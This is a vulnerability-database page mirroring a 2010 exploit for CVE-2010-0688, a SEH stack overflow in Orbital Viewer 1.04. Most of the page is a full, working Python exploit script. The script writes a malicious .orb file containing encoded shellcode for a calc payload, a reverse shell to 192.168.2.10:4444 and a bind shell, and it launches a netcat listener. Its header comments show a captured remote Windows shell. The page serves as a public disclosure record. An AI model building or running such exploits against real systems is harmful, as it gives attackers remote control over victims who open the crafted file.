Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Orbital Viewer 1.04 - '.orb' File Local Universal Overflow (SEH)

🗓️ 26 Feb 2010 00:00:00Reported by mr_meType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 48 Views

Orbital Viewer v1.04 (.orb) Local SEH Overflow Exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Orbital Viewer v1.04 (.orb) 0day Local Universal SEH Overflow Exploit
26 Feb 201000:00
zdt
Circl		CVE-2010-0688
26 Feb 201000:00
circl
Check Point Advisories		Orbitals.com Orbital Viewer .orb Stack Buffer Overflow (CVE-2010-0688)
2 Jan 201000:00
checkpoint_advisories
CVE		CVE-2010-0688
19 Mar 201020:00
cve
Cvelist		CVE-2010-0688
19 Mar 201020:00
cvelist
Exploit DB		Orbital Viewer - '.ORB' File Parsing Buffer Overflow (Metasploit)
9 Mar 201000:00
exploitdb
exploitpack		Orbital Viewer 1.04 - .orb File Local Universal Overflow (SEH)
26 Feb 201000:00
exploitpack
Metasploit		Orbital Viewer ORB File Parsing Buffer Overflow
9 Mar 201001:04
metasploit
NVD		CVE-2010-0688
19 Mar 201020:30
nvd
OpenVAS		Orbital Viewer File Processing Buffer Overflow Vulnerabilities
30 Mar 201000:00
openvas
Rows per page
#!/usr/bin/python
#
################################################################
# 
# Orbital Viewer v1.04 (.orb) 0day Local Universal SEH Overflow Exploit
# Date: 27 Feb 2010
# CVE: CVE-2010-0688
# Download: http://www.orbitals.com/orb/ov.htm 
# Found & exploited by: mr_me (http://net-ninja.net)
# Greetz to: corelanc0d3r/eske/sinn3r/EdiStrosar/Rick2600/MarkoT/jnz/Redsees
# Tested on: Windows xp sp3
#
################################################################
# Bad chars: \x00\x0a\xbd\x0d\x20
# Here we go.. !	...all the way from Australia...
#
# [+] Orbital Viewer v1.04 (.orb) Universal SEH Overflow Exploit
# [+] Shellcode options
#         1: calc.exe
#         2: reverse shell
#         3: bind shell
# [+] which shellcode? 2
# [+] Vulnerable file created!
# [+] Listening on port 4444...
# listening on [any] 4444 ...
# 192.168.2.55: inverse host lookup failed: Unknown server error : Connection timed out
# connect to [192.168.2.10] from (UNKNOWN) [192.168.2.55] 2222
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# 
# C:\Documents and Settings\Steve>
#

import sys, os

print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
print "|								  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] Orbital Viewer v1.04 (.orb) Universal SEH Overflow Exploit"

# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, CMD=calc.exe

calc = ("\xd9\xf7\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
"\x4c\x4a\x48\x51\x54\x45\x50\x43\x30\x45\x50\x4c\x4b\x51\x55"
"\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x43\x31\x4a\x4f\x4c"
"\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a\x4b"
"\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49"
"\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x42\x54\x44\x47\x49\x51"
"\x49\x5a\x44\x4d\x45\x51\x49\x52\x4a\x4b\x4b\x44\x47\x4b\x50"
"\x54\x47\x54\x45\x54\x44\x35\x4d\x35\x4c\x4b\x51\x4f\x51\x34"
"\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51"
"\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31"
"\x4a\x4b\x4c\x49\x51\x4c\x46\x44\x43\x34\x48\x43\x51\x4f\x50"
"\x31\x4a\x56\x43\x50\x50\x56\x42\x44\x4c\x4b\x50\x46\x50\x30"
"\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c"
"\x4b\x42\x48\x45\x58\x4b\x39\x4a\x58\x4b\x33\x49\x50\x42\x4a"
"\x50\x50\x42\x48\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x45\x38\x4a"
"\x38\x4b\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43"
"\x45\x31\x42\x4c\x43\x53\x46\x4e\x43\x55\x43\x48\x45\x35\x45"
"\x50\x41\x41")

# windows/shell_reverse_tcp - 636 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# LHOST=192.168.2.10, EXITFUNC=seh, LPORT=4444

rev = ("\x89\xe6\xda\xd8\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x46\x44\x47\x54\x4c\x4b"
"\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48\x43\x31\x4a"
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x45\x51"
"\x4a\x4b\x47\x39\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50"
"\x31\x49\x50\x4a\x39\x4e\x4c\x4c\x44\x49\x50\x43\x44\x45\x57"
"\x49\x51\x49\x5a\x44\x4d\x45\x51\x49\x52\x4a\x4b\x4a\x54\x47"
"\x4b\x50\x54\x46\x44\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
"\x47\x54\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c"
"\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x43\x33\x46\x4c\x4c\x4b"
"\x4b\x39\x42\x4c\x51\x34\x45\x4c\x45\x31\x48\x43\x46\x51\x49"
"\x4b\x42\x44\x4c\x4b\x50\x43\x50\x30\x4c\x4b\x47\x30\x44\x4c"
"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x51\x50\x43\x38\x51"
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f"
"\x48\x56\x45\x36\x46\x33\x43\x56\x45\x38\x46\x53\x46\x52\x43"
"\x58\x43\x47\x43\x43\x47\x42\x51\x4f\x46\x34\x4b\x4f\x4e\x30"
"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48"
"\x56\x51\x4f\x4d\x59\x4d\x35\x43\x56\x4b\x31\x4a\x4d\x43\x38"
"\x43\x32\x51\x45\x42\x4a\x43\x32\x4b\x4f\x48\x50\x43\x58\x4e"
"\x39\x45\x59\x4b\x45\x4e\x4d\x46\x37\x4b\x4f\x48\x56\x51\x43"
"\x46\x33\x51\x43\x51\x43\x51\x53\x51\x43\x47\x33\x46\x33\x4b"
"\x4f\x4e\x30\x42\x48\x49\x50\x49\x38\x44\x42\x44\x4a\x42\x46"
"\x42\x48\x42\x31\x51\x4c\x42\x46\x46\x33\x4c\x49\x4b\x51\x4d"
"\x45\x42\x48\x4a\x4c\x4c\x39\x4e\x4a\x43\x50\x51\x47\x4b\x4f"
"\x48\x56\x42\x4a\x42\x30\x46\x31\x50\x55\x4b\x4f\x48\x50\x45"
"\x36\x43\x5a\x42\x44\x45\x36\x42\x48\x43\x53\x42\x4d\x43\x5a"
"\x50\x50\x46\x39\x47\x59\x48\x4c\x4c\x49\x4a\x47\x43\x5a\x47"
"\x34\x4c\x49\x4d\x32\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4a\x35"
"\x4d\x59\x4b\x4d\x4b\x4e\x51\x52\x46\x4d\x4b\x4e\x50\x42\x46"
"\x4c\x4c\x4d\x43\x4a\x47\x48\x4e\x4b\x4e\x4b\x4e\x4b\x42\x48"
"\x44\x32\x4b\x4e\x4e\x53\x42\x36\x4b\x4f\x44\x35\x47\x58\x4b"
"\x4f\x4e\x36\x51\x4b\x46\x37\x50\x52\x50\x51\x50\x51\x50\x51"
"\x42\x4a\x45\x51\x46\x31\x50\x51\x46\x35\x46\x31\x4b\x4f\x48"
"\x50\x42\x48\x4e\x4d\x4e\x39\x44\x45\x48\x4e\x46\x33\x4b\x4f"
"\x4e\x36\x42\x4a\x4b\x4f\x4b\x4f\x47\x47\x4b\x4f\x4e\x30\x43"
"\x58\x4d\x37\x43\x49\x48\x46\x44\x39\x4b\x4f\x43\x45\x43\x34"
"\x4b\x4f\x49\x46\x4b\x4f\x42\x57\x4b\x4c\x4b\x4f\x4e\x30\x45"
"\x38\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x51\x43\x4b\x4f\x4e\x36"
"\x4b\x4f\x4e\x30\x41\x41")

# windows/shell_bind_tcp - 695 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=192.168.2.55

bind =("\xdb\xc1\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
"\x4c\x43\x5a\x4a\x4b\x50\x4d\x4a\x48\x4c\x39\x4b\x4f\x4b\x4f"
"\x4b\x4f\x45\x30\x4c\x4b\x42\x4c\x51\x34\x47\x54\x4c\x4b\x47"
"\x35\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x45\x51\x4a\x4f"
"\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x45\x51\x4a"
"\x4b\x47\x39\x4c\x4b\x47\x44\x4c\x4b\x43\x31\x4a\x4e\x50\x31"
"\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x44\x47\x49"
"\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47\x4b"
"\x50\x54\x47\x54\x47\x58\x42\x55\x4d\x35\x4c\x4b\x51\x4f\x51"
"\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b"
"\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b\x4d"
"\x59\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x50\x31\x49\x4b"
"\x43\x54\x4c\x4b\x51\x53\x46\x50\x4c\x4b\x47\x30\x44\x4c\x4c"
"\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x51\x50\x43\x38\x51\x4e"
"\x43\x58\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f\x48"
"\x56\x45\x36\x50\x53\x42\x46\x43\x58\x47\x43\x46\x52\x42\x48"
"\x43\x47\x44\x33\x50\x32\x51\x4f\x46\x34\x4b\x4f\x48\x50\x43"
"\x58\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x49\x46"
"\x51\x4f\x4c\x49\x4a\x45\x45\x36\x4d\x51\x4a\x4d\x44\x48\x45"
"\x52\x46\x35\x43\x5a\x43\x32\x4b\x4f\x48\x50\x42\x48\x49\x49"
"\x44\x49\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x4e\x36\x50\x53\x46"
"\x33\x46\x33\x46\x33\x51\x43\x50\x43\x50\x53\x47\x33\x50\x53"
"\x4b\x4f\x4e\x30\x45\x36\x42\x48\x44\x51\x51\x4c\x43\x56\x51"
"\x43\x4c\x49\x4b\x51\x4d\x45\x43\x58\x49\x34\x44\x5a\x42\x50"
"\x49\x57\x51\x47\x4b\x4f\x4e\x36\x42\x4a\x44\x50\x46\x31\x50"
"\x55\x4b\x4f\x48\x50\x42\x48\x49\x34\x4e\x4d\x46\x4e\x4a\x49"
"\x51\x47\x4b\x4f\x49\x46\x50\x53\x46\x35\x4b\x4f\x48\x50\x45"
"\x38\x4d\x35\x51\x59\x4b\x36\x51\x59\x46\x37\x4b\x4f\x4e\x36"
"\x46\x30\x46\x34\x51\x44\x51\x45\x4b\x4f\x48\x50\x4a\x33\x43"
"\x58\x4a\x47\x42\x59\x49\x56\x42\x59\x51\x47\x4b\x4f\x49\x46"
"\x46\x35\x4b\x4f\x4e\x30\x45\x36\x43\x5a\x45\x34\x43\x56\x42"
"\x48\x42\x43\x42\x4d\x4d\x59\x4d\x35\x42\x4a\x46\x30\x51\x49"
"\x47\x59\x48\x4c\x4d\x59\x4b\x57\x43\x5a\x51\x54\x4b\x39\x4a"
"\x42\x50\x31\x49\x50\x4b\x43\x4e\x4a\x4b\x4e\x51\x52\x46\x4d"
"\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x46\x58\x4e"
"\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x4e\x53\x45\x46"
"\x4b\x4f\x43\x45\x47\x34\x4b\x4f\x4e\x36\x51\x4b\x46\x37\x50"
"\x52\x46\x31\x46\x31\x46\x31\x42\x4a\x43\x31\x46\x31\x46\x31"
"\x46\x35\x46\x31\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x48\x59\x45"
"\x55\x48\x4e\x46\x33\x4b\x4f\x49\x46\x42\x4a\x4b\x4f\x4b\x4f"
"\x46\x57\x4b\x4f\x4e\x30\x4c\x4b\x46\x37\x4b\x4c\x4d\x53\x48"
"\x44\x45\x34\x4b\x4f\x48\x56\x50\x52\x4b\x4f\x48\x50\x45\x38"
"\x4c\x30\x4c\x4a\x45\x54\x51\x4f\x46\x33\x4b\x4f\x49\x46\x4b"
"\x4f\x4e\x30\x41\x41");

header = "\x4f\x72\x62\x69\x74\x61\x6c\x46"
header += "\x69\x6c\x65\x56\x31\x2e\x30\x0d\x0a"
nops = "\x90" * 1010
fly = "\xe9\xc8\xf9\xff\xff"
nseh = "\xeb\xf9\x90\x90"	
seh = "\x50\x82\x45"		# partial overwrite - ppr from ov.exe

print "[+] Shellcode options"
print "\t1: calc.exe"
print "\t2: reverse shell"
print "\t3: bind shell" 
msg = '[+] which shellcode? '
uin = raw_input(msg).strip()

if not uin:
	print "[-] You have not entered 1,2 or 3, quiting"
	sys.exit(1)
if uin == '1':
	junk = "\x41" * (5045 - len(calc))
        lol = header + junk + nops + calc + fly + nseh + seh;
if uin == '2':
	junk = "\x41" * (5045 - len(rev))
	lol = header + junk + nops + rev + fly + nseh + seh;
if uin == '3':
	junk = "\x41" * (5045 - len(bind))
        lol = header + junk + nops + bind + fly + nseh + seh;

try:
   vulnerable = open("mr_me-owns-orbital.orb",'w')
   vulnerable.write(lol)
   vulnerable.close()
   print "[+] Vulnerable file created!"
   if uin == '2':
	print "[+] Listening on port 4444..."
	os.system("nc -lvp 4444")
except:
   print "[-] Error occured!"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Feb 2010 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 29.3
EPSS0.67507
orbital viewerlocal universalseh overflow
48